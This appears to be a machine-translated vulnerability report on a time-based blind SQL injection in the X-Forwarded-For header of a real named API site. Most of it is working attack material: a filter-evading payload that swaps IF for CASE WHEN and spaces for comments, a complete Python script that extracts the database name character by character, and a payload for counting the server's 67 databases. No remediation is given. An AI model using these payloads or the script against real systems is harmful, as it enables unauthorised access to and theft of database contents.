The SQL injection vulnerability exists in the official Apsara stack APP (67 databases and verification scripts are supported)

The SQL injection vulnerability exists in the official Apsara stack APP (67 databases and verification scripts are supported)

Ask SQLMAP to bypass the if-filtered tamper ~

Target: Official api.fengniao.com)

The SQL injection vulnerability exists in the following areas: (X-Forwarded-For in the header, delayed blind injection)
 

GET http://api.fengniao.com/app_ipad/news_list.php HTTP/1.1Accept-Encoding: gzip,deflateX-Forwarded-For: 1Connection: closeAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Host: api.fengniao.com

Because the website is configured with filtering (space, comma/if, etc.), SQLMap is not running ...... Therefore, you can only write Python and run it. First, you can manually get the Payload as follows, and use/**/as the space. IF, use case when instead:
 

'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/1=1/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm

Therefore, you only need to replace 1 = 1 with the query statement. Therefore, the verification script is attached: (take the current database name as an example. Modify the proxy in the script during testing)
 

#!/usr/bin/env python#coding=utf8import httplib, urllib, re, timedatabase = ''temp_database = ''httpClient = Nonecount = 0i = 33while i < 128:    if i == 37:        i = i+1    try:        headers = {"Host": "api.fengniao.com",                    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",                    "Accept-Encoding": "gzip,deflate",                    "X-Forwarded-For": "'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/(database()/**/like/**/0x"+temp_database+str(hex(i))[2:]+"25)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm",                    "Accept": "*/*",                    "Connection": "close"}        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30)        url = 'http://api.fengniao.com/app_ipad/news_list.php'        httpClient.request("GET", url=url, headers=headers)        st = time.time()        response = httpClient.getresponse()        rp = response.read()        if count == 1:            if time.time()-st > 3:                temp_database = temp_database + str(hex(i))[2:]                database = database + chr(i)                print 'user(): ', database                i = 33                count = 0            else:                count = 0        elif time.time()-st > 3:            count = 1            i = i-1        i=i+1            except Exception, e:        print e    finally:        if httpClient:            httpClient.close()

 

1. Run out of the current database user
 

2. Run the current database name
 

3. Run out of all database names and found 67 in total. The payload is as follows:
 

'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(CASE/**/WHEN/**/((select/**/count(*)/**/from/**/information_schema.SCHEMATA)=67)/**/THEN/**/3/**/else/**/0/**/END)))nKfJ)/**/AND/**/'zyYm'='zyYm

Too many, so let's just run the first few ......
 

4. Run the table name of the current database and only run the first two for verification ~
 

Solution:

Please kindly advise ~